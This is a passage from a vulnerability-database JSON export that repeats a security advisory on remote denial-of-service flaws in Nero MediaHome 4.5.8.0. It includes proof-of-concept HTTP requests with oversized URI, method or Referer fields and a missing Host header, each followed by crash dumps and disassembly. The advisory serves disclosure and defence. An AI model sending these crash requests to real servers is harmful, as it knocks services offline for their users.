N/A\r\n EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)\r\n ECX: 039cddea ( 60612074) -> localhost (heap)\r\n EDX: 039cddea ( 60612074) -> localhost (heap)\r\n EDI: 037bc888 ( 58443912) -> ||{[email\u00a0protected]}{AY+ (heap)\r\n ESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)\r\n EBP: 00000009 ( 9) -> N/A\r\n ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)\r\n +00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)\r\n +04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)\r\n +08: 00000000 ( 0) -> N/A\r\n +0c: 00000001 ( 1) -> N/A\r\n +10: 000000b8 ( 184) -> N/A\r\n +14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n 0x10003156 mov edx,[esi+0x8]\r\n 0x10003159 mov ebp,[esi+0xc]\r\n 0x1000315c push byte 0x1\r\n 0x1000315e push eax\r\n 0x1000315f push ecx\r\n 0x10003160 push ebx\r\n 0x10003161 mov [edi+0x40],esi\r\n 0x10003164 mov [esp+0x2c],edx\r\n 0x10003168 call 0x10002730\r\n 0x1000316d mov ecx,[esp+0x2c]\r\n 0x10003171 mov [eax+0x18],ebp\r\n 0x10003174 mov ebp,[esp+0x24]\r\n 0x10003178 add esp,0x10\r\n 0x1000317b mov [eax+0x14],ecx\r\n 0x1000317e mov edx,[ebp+0x8]\r\n 0x10003181 test edx,edx\r\n 0x10003183 mov [esp+0x14],edx\r\n 0x10003187 jnz 0x10002ff0\r\n 0x1000318d mov eax,[esp+0x24]\r\n 0x10003191 push eax\r\n 0x10003192 call 0x10002c20\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash Nero MediaHome server remotely:\r\n\r\nGET / HTTP/1.1\r\n: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer: http://www.host.com\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nVendor last response (January 9, 2013):\r\n\"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon.\"\r\n\r\nAs a temporary solution it is advised to remove the vulnerable application from your system.\r\n\r\n-----------------------------------------------------------------------------------------------\n\n# 0day.today [2018-01-04] #", "sourceHref": "https://0day.today/exploit/20143", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:37", "description": "\nNero MediaHome 4.5.8.0 - Denial of Service", "edition": 2, "published": "2013-01-10T00:00:00", "title": "Nero MediaHome 4.5.8.0 - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5876", "CVE-2012-5877"], "modified": "2013-01-10T00:00:00", "id": "EXPLOITPACK:84B8B4D7CE121A11D90EAFE9250FF34E", "href": "", "sourceData": "Advisory ID: HTB23130\nProduct: Nero MediaHome\nVendor: Nero\nVulnerable Version(s): 4.5.8.0 and probably prior\nTested Version: 4.5.8.0 in Windows 7 SP1\nVendor Notification: November 21, 2012 \nPublic Disclosure: January 9, 2013 \nVulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]\nCVE References: CVE-2012-5876, CVE-2012-5877\nCVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)\nRisk Level: Low \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.\n\n\n1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876\n\n1.1 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.\n\nCrash details:\n\nEIP: 7c921689 mov ecx,[ecx]\nEAX: 03b2a808 ( 62040072) -> (heap)\nEBX: 003e0000 ( 4063232) -> b@>@>\" (heap)\nECX: 00000000 ( 0) -> N/A\nEDX: 00000000 ( 0) -> N/A\nEDI: 03b2b000 ( 62042112) -> D (heap)\nESI: 03b2a800 ( 62040064) -> (heap)\nEBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. (stack)\nESP: 0526f848 ( 86440008) -> >\">&|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>. (stack)\n+00: 003e0000 ( 4063232) -> b@>@>\" (heap)\n+04: 00000022 ( 34) -> N/A\n+08: 003e0004 ( 4063236) -> b@>@>\" (heap)\n+0c: 0526f88c ( 86440076) -> &$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)\n+10: 7c928ccd (2089979085) -> N/A\n+14: 00000000 ( 0) -> N/A\n\n\nDisasm around:\n\n 0x7c921664 mov ecx,[ebp+0x10]\n 0x7c921667 add eax,[ecx]\n 0x7c921669 cmp eax,0xfe00\n 0x7c92166e ja 0x7c920721\n 0x7c921674 cmp byte [ebp+0x14],0x0\n 0x7c921678 jnz 0x7c95ae10\n 0x7c92167e mov ecx,[esi+0xc]\n 0x7c921681 lea eax,[esi+0x8]\n 0x7c921684 mov edx,[eax]\n 0x7c921686 mov [ebp+0x8],ecx\n 0x7c921689 mov ecx,[ecx]\n 0x7c92168b cmp ecx,[edx+0x4]\n 0x7c92168e mov [ebp+0xc],edx\n 0x7c921691 jnz 0x7c921734\n 0x7c921697 cmp ecx,eax\n 0x7c921699 jnz 0x7c921734\n 0x7c92169f push esi\n 0x7c9216a0 push ebx\n 0x7c9216a1 call 0x7c920684\n 0x7c9216a6 mov eax,[ebp+0xc]\n 0x7c9216a9 mov ecx,[ebp+0x8]\n\n\nProof of Concept:\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\n\nGET /[A * 500000] HTTP/1.1\nHOST: somehost.com\nACCEPT: */*\nAccept-Encoding: None\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\nConnection: Close\nAccept-Transfer-Encoding: None\n\n\n\n1.2 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.\n\nCrash details:\n\nEIP: 7c921689 mov ecx,[ecx]\nEAX: 03b63008 ( 62271496) -> (heap)\nEBX: 003e0000 ( 4063232) -> # 8@>+ (heap)\nECX: 00000000 ( 0) -> N/A\nEDX: 00000000 ( 0) -> N/A\nEDI: 03b64000 ( 62275584) -> B (heap)\nESI: 03b63000 ( 62271488) -> (heap)\nEBP: 0527f864 ( 86505572) -> '|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]| (stack)\nESP: 0527f858 ( 86505560) -> >!>'|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' | (stack)\n+00: 003e0000 ( 4063232) -> # 8@>+ (heap)\n+04: 00000021 ( 33) -> N/A\n+08: 003e0004 ( 4063236) -> # 8@>+ (heap)\n+0c: 0527f89c ( 86505628) -> '$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)\n+10: 7c928ccd (2089979085) -> N/A\n+14: 00000000 ( 0) -> N/A\n\n\nDisasm around:\n\n 0x7c921664 mov ecx,[ebp+0x10]\n 0x7c921667 add eax,[ecx]\n 0x7c921669 cmp eax,0xfe00\n 0x7c92166e ja 0x7c920721\n 0x7c921674 cmp byte [ebp+0x14],0x0\n 0x7c921678 jnz 0x7c95ae10\n 0x7c92167e mov ecx,[esi+0xc]\n 0x7c921681 lea eax,[esi+0x8]\n 0x7c921684 mov edx,[eax]\n 0x7c921686 mov [ebp+0x8],ecx\n 0x7c921689 mov ecx,[ecx]\n 0x7c92168b cmp ecx,[edx+0x4]\n 0x7c92168e mov [ebp+0xc],edx\n 0x7c921691 jnz 0x7c921734\n 0x7c921697 cmp ecx,eax\n 0x7c921699 jnz 0x7c921734\n 0x7c92169f push esi\n 0x7c9216a0 push ebx\n 0x7c9216a1 call 0x7c920684\n 0x7c9216a6 mov eax,[ebp+0xc]\n 0x7c9216a9 mov ecx,[ebp+0x8]\n\n\nProof of Concept:\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\n\nHEAD / [A * 265696] HTTP/1.1\nACCEPT: */*\nAccept-Encoding: None\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\nConnection: Close\nAccept-Transfer-Encoding: None\n\n\n\n1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.\n\nCrash details:\n\nEIP: 7c920a1b cmp ecx,[edx+0x4]\nEAX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\nEBX: 003e0000 ( 4063232) -> @>+ (heap)\nECX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\nEDX: 03b50101 ( 62193921) -> N/A\nEDI: 03c1bb30 ( 63028016) -> yDPyDh8yDh >>#H\"G^^^^o^I@_l (heap)\nESI: 03c1bb88 ( 63028104) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\nEBP: 033bfc78 ( 54262904) -> L;L (stack)\nESP: 033bfc6c ( 54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)\n+00: 003e0000 ( 4063232) -> @>+ (heap)\n+04: 03c1bb78 ( 63028088) -> >>#H\"G^^^^o^I@_lhf19fPf36dLa (heap)\n+08: 00000000 ( 0) -> N/A\n+0c: 033bfd4c ( 54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)\n+10: 7c92084c (2089945164) -> N/A\n+14: 03adb908 ( 61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)\n\n\nDisasm around:\n\n 0x7c9209fe mov al,[esi+0x5]\n 0x7c920a01 and al,0x10\n 0x7c920a03 test al,0x10\n 0x7c920a05 mov [edi+0x5],al\n 0x7c920a08 jnz 0x7c920aa0\n 0x7c920a0e mov ecx,[esi+0xc]\n 0x7c920a11 lea eax,[esi+0x8]\n 0x7c920a14 mov edx,[eax]\n 0x7c920a16 mov [ebp+0xc],ecx\n 0x7c920a19 mov ecx,[ecx]\n 0x7c920a1b cmp ecx,[edx+0x4]\n 0x7c920a1e mov [ebp+0x14],edx\n 0x7c920a21 jnz 0x7c921752\n 0x7c920a27 cmp ecx,eax\n 0x7c920a29 jnz 0x7c921752\n 0x7c920a2f push esi\n 0x7c920a30 push ebx\n 0x7c920a31 call 0x7c920684\n 0x7c920a36 mov eax,[ebp+0x14]\n 0x7c920a39 mov ecx,[ebp+0xc]\n 0x7c920a3c cmp eax,ecx\n\n\nProof of Concept:\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\n\nOPTIONS / [A * 265712]\nHost: somehost.com\nUser-Agent: Mozilla/5.0 (Windows; U)\nAccept-Language: en-us,en;q=0.5\nKeep-Alive: 300\nReferer: http://www.host.com\n\n\n\n1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. \n\nCrash details:\n\nEIP: 7c920a19 mov ecx,[ecx]\nEAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\nEBX: 003e0000 ( 4063232) -> Tp@>+ (heap)\nECX: 41414141 (1094795585) -> N/A\nEDX: 41414141 (1094795585) -> N/A\nEDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)\nESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\nEBP: 0527f828 ( 86505512) -> `' (stack)\nESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' | (stack)\n +00: 003e0000 ( 4063232) -> Tp@>+ (heap)\n +04: 00000021 ( 33) -> N/A\n +08: 003e0004 ( 4063236) -> Tp@>+ (heap)\n +0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' |>@'X`4' |`| (stack)\n +10: 7c928ccd (2089979085) -> N/A\n +14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)\n\n\nDisasm around:\n\n 0x7c9209f8 jnz 0x7c95af5f\n 0x7c9209fe mov al,[esi+0x5]\n 0x7c920a01 and al,0x10\n 0x7c920a03 test al,0x10\n 0x7c920a05 mov [edi+0x5],al\n 0x7c920a08 jnz 0x7c920aa0\n 0x7c920a0e mov ecx,[esi+0xc]\n 0x7c920a11 lea eax,[esi+0x8]\n 0x7c920a14 mov edx,[eax]\n 0x7c920a16 mov [ebp+0xc],ecx\n 0x7c920a19 mov ecx,[ecx]\n 0x7c920a1b cmp ecx,[edx+0x4]\n 0x7c920a1e mov [ebp+0x14],edx\n 0x7c920a21 jnz 0x7c921752\n 0x7c920a27 cmp ecx,eax\n 0x7c920a29 jnz 0x7c921752\n 0x7c920a2f push esi\n 0x7c920a30 push ebx\n 0x7c920a31 call 0x7c920684\n 0x7c920a36 mov eax,[ebp+0x14]\n 0x7c920a39 mov ecx,[ebp+0xc]\n\n\nProof of Concept:\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\n\nGET / HTTP/1.1\nHost: somehost.com\nUser-Agent: Mozilla/5.0 (Windows; U)\nAccept-Language: en-us,en;q=0.5\nKeep-Alive: 300\nConnection: keep-alive\nReferer:[A * 265566]\n\n\n\n2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877\n\n2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.\n\nCrash details:\n\nEIP: 10003171 mov [eax+0x18],ebp\n EAX: 00000000 ( 0) -> N/A\n EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)\n ECX: 039cddea ( 60612074) -> localhost (heap)\n EDX: 039cddea ( 60612074) -> localhost (heap)\n EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap)\n ESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)\n EBP: 00000009 ( 9) -> N/A\n ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)\n +00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)\n +04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)\n +08: 00000000 ( 0) -> N/A\n +0c: 00000001 ( 1) -> N/A\n +10: 000000b8 ( 184) -> N/A\n +14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)\n\n\nDisasm around:\n\n 0x10003156 mov edx,[esi+0x8]\n 0x10003159 mov ebp,[esi+0xc]\n 0x1000315c push byte 0x1\n 0x1000315e push eax\n 0x1000315f push ecx\n 0x10003160 push ebx\n 0x10003161 mov [edi+0x40],esi\n 0x10003164 mov [esp+0x2c],edx\n 0x10003168 call 0x10002730\n 0x1000316d mov ecx,[esp+0x2c]\n 0x10003171 mov [eax+0x18],ebp\n 0x10003174 mov ebp,[esp+0x24]\n 0x10003178 add esp,0x10\n 0x1000317b mov [eax+0x14],ecx\n 0x1000317e mov edx,[ebp+0x8]\n 0x10003181 test edx,edx\n 0x10003183 mov [esp+0x14],edx\n 0x10003187 jnz 0x10002ff0\n 0x1000318d mov eax,[esp+0x24]\n 0x10003191 push eax\n 0x10003192 call 0x10002c20\n\n\nProof of Concept:\nThe following HTTP request will crash Nero MediaHome server remotely:\n\nGET / HTTP/1.1\n: somehost.com\nUser-Agent: Mozilla/5.0 (Windows; U)\nAccept-Language: en-us,en;q=0.5\nKeep-Alive: 300\nConnection: keep-alive\nReferer: http://www.host.com\n\n\n-----------------------------------------------------------------------------------------------\n\nSolution:\n\nVendor last response (January 9, 2013):\n\"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon.\"\n\nAs a temporary solution it is advised to remove the vulnerable application from your system.\n\n-----------------------------------------------------------------------------------------------\n\nReferences:\n\n[1] High-Tech Bridge Advisory HTB23130 - https://www.htbridge.com/advisory/HTB23130 - Nero MediaHome Server Multiple Remote DoS vulnerabilities.\n[2] Nero - http://www.nero.com - Nero MediaHome server easily distributes music, videos and photos over your network.\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:44", "description": "", "published": "2013-01-10T00:00:00", "type": "packetstorm", "title": "Nero MediaHome 4.5.8.0 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5876", "CVE-2012-5877"], "modified": "2013-01-10T00:00:00", "id": "PACKETSTORM:119424", "href": "https://packetstormsecurity.com/files/119424/Nero-MediaHome-4.5.8.0-Denial-Of-Service.html", "sourceData": "`Advisory ID: HTB23130 \nProduct: Nero MediaHome \nVendor: Nero \nVulnerable Version(s): 4.5.8.0 and probably prior \nTested Version: 4.5.8.0 in Windows 7 SP1 \nVendor Notification: November 21, 2012 \nPublic Disclosure: January 9, 2013 \nVulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236] \nCVE References: CVE-2012-5876, CVE-2012-5877 \nCVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P) \nRisk Level: Low \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely. \n \n \n1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876 \n \n1.1 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server. \n \nCrash details: \n \nEIP: 7c921689 mov ecx,[ecx] \nEAX: 03b2a808 ( 62040072) -> (heap) \nEBX: 003e0000 ( 4063232) -> b@>@>\" (heap) \nECX: 00000000 ( 0) -> N/A \nEDX: 00000000 ( 0) -> N/A \nEDI: 03b2b000 ( 62042112) -> D (heap) \nESI: 03b2a800 ( 62040064) -> (heap) \nEBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. (stack) \nESP: 0526f848 ( 86440008) -> >\">&|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>. (stack) \n+00: 003e0000 ( 4063232) -> b@>@>\" (heap) \n+04: 00000022 ( 34) -> N/A \n+08: 003e0004 ( 4063236) -> b@>@>\" (heap) \n+0c: 0526f88c ( 86440076) -> &$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack) \n+10: 7c928ccd (2089979085) -> N/A \n+14: 00000000 ( 0) -> N/A \n \n \nDisasm around: \n \n0x7c921664 mov ecx,[ebp+0x10] \n0x7c921667 add eax,[ecx] \n0x7c921669 cmp eax,0xfe00 \n0x7c92166e ja 0x7c920721 \n0x7c921674 cmp byte [ebp+0x14],0x0 \n0x7c921678 jnz 0x7c95ae10 \n0x7c92167e mov ecx,[esi+0xc] \n0x7c921681 lea eax,[esi+0x8] \n0x7c921684 mov edx,[eax] \n0x7c921686 mov [ebp+0x8],ecx \n0x7c921689 mov ecx,[ecx] \n0x7c92168b cmp ecx,[edx+0x4] \n0x7c92168e mov [ebp+0xc],edx \n0x7c921691 jnz 0x7c921734 \n0x7c921697 cmp ecx,eax \n0x7c921699 jnz 0x7c921734 \n0x7c92169f push esi \n0x7c9216a0 push ebx \n0x7c9216a1 call 0x7c920684 \n0x7c9216a6 mov eax,[ebp+0xc] \n0x7c9216a9 mov ecx,[ebp+0x8] \n \n \nProof of Concept: \nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely: \n \nGET /[A * 500000] HTTP/1.1 \nHOST: somehost.com \nACCEPT: */* \nAccept-Encoding: None \nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) \nConnection: Close \nAccept-Transfer-Encoding: None \n \n \n \n1.2 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server. \n \nCrash details: \n \nEIP: 7c921689 mov ecx,[ecx] \nEAX: 03b63008 ( 62271496) -> (heap) \nEBX: 003e0000 ( 4063232) -> # 8@>+ (heap) \nECX: 00000000 ( 0) -> N/A \nEDX: 00000000 ( 0) -> N/A \nEDI: 03b64000 ( 62275584) -> B (heap) \nESI: 03b63000 ( 62271488) -> (heap) \nEBP: 0527f864 ( 86505572) -> '|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]| (stack) \nESP: 0527f858 ( 86505560) -> >!>'|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' | (stack) \n+00: 003e0000 ( 4063232) -> # 8@>+ (heap) \n+04: 00000021 ( 33) -> N/A \n+08: 003e0004 ( 4063236) -> # 8@>+ (heap) \n+0c: 0527f89c ( 86505628) -> '$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack) \n+10: 7c928ccd (2089979085) -> N/A \n+14: 00000000 ( 0) -> N/A \n \n \nDisasm around: \n \n0x7c921664 mov ecx,[ebp+0x10] \n0x7c921667 add eax,[ecx] \n0x7c921669 cmp eax,0xfe00 \n0x7c92166e ja 0x7c920721 \n0x7c921674 cmp byte [ebp+0x14],0x0 \n0x7c921678 jnz 0x7c95ae10 \n0x7c92167e mov ecx,[esi+0xc] \n0x7c921681 lea eax,[esi+0x8] \n0x7c921684 mov edx,[eax] \n0x7c921686 mov [ebp+0x8],ecx \n0x7c921689 mov ecx,[ecx] \n0x7c92168b cmp ecx,[edx+0x4] \n0x7c92168e mov [ebp+0xc],edx \n0x7c921691 jnz 0x7c921734 \n0x7c921697 cmp ecx,eax \n0x7c921699 jnz 0x7c921734 \n0x7c92169f push esi \n0x7c9216a0 push ebx \n0x7c9216a1 call 0x7c920684 \n0x7c9216a6 mov eax,[ebp+0xc] \n0x7c9216a9 mov ecx,[ebp+0x8] \n \n \nProof of Concept: \nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely: \n \nHEAD / [A * 265696] HTTP/1.1 \nACCEPT: */* \nAccept-Encoding: None \nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) \nConnection: Close \nAccept-Transfer-Encoding: None \n \n \n \n1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server. \n \nCrash details: \n \nEIP: 7c920a1b cmp ecx,[edx+0x4] \nEAX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap) \nEBX: 003e0000 ( 4063232) -> @>+ (heap) \nECX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap) \nEDX: 03b50101 ( 62193921) -> N/A \nEDI: 03c1bb30 ( 63028016) -> yDPyDh8yDh >>#H\"G^^^^o^I@_l (heap) \nESI: 03c1bb88 ( 63028104) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap) \nEBP: 033bfc78 ( 54262904) -> L;L (stack) \nESP: 033bfc6c ( 54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack) \n+00: 003e0000 ( 4063232) -> @>+ (heap) \n+04: 03c1bb78 ( 63028088) -> >>#H\"G^^^^o^I@_lhf19fPf36dLa (heap) \n+08: 00000000 ( 0) -> N/A \n+0c: 033bfd4c ( 54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack) \n+10: 7c92084c (2089945164) -> N/A \n+14: 03adb908 ( 61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap) \n \n \nDisasm around: \n \n0x7c9209fe mov al,[esi+0x5] \n0x7c920a01 and al,0x10 \n0x7c920a03 test al,0x10 \n0x7c920a05 mov [edi+0x5],al \n0x7c920a08 jnz 0x7c920aa0 \n0x7c920a0e mov ecx,[esi+0xc] \n0x7c920a11 lea eax,[esi+0x8] \n0x7c920a14 mov edx,[eax] \n0x7c920a16 mov [ebp+0xc],ecx \n0x7c920a19 mov ecx,[ecx] \n0x7c920a1b cmp ecx,[edx+0x4] \n0x7c920a1e mov [ebp+0x14],edx \n0x7c920a21 jnz 0x7c921752 \n0x7c920a27 cmp ecx,eax \n0x7c920a29 jnz 0x7c921752 \n0x7c920a2f push esi \n0x7c920a30 push ebx \n0x7c920a31 call 0x7c920684 \n0x7c920a36 mov eax,[ebp+0x14] \n0x7c920a39 mov ecx,[ebp+0xc] \n0x7c920a3c cmp eax,ecx \n \n \nProof of Concept: \nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely: \n \nOPTIONS / [A * 265712] \nHost: somehost.com \nUser-Agent: Mozilla/5.0 (Windows; U) \nAccept-Language: en-us,en;q=0.5 \nKeep-Alive: 300 \nReferer: http://www.host.com \n \n \n \n1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. \n \nCrash details: \n \nEIP: 7c920a19 mov ecx,[ecx] \nEAX: 03c3c008 ( 63160328) -> 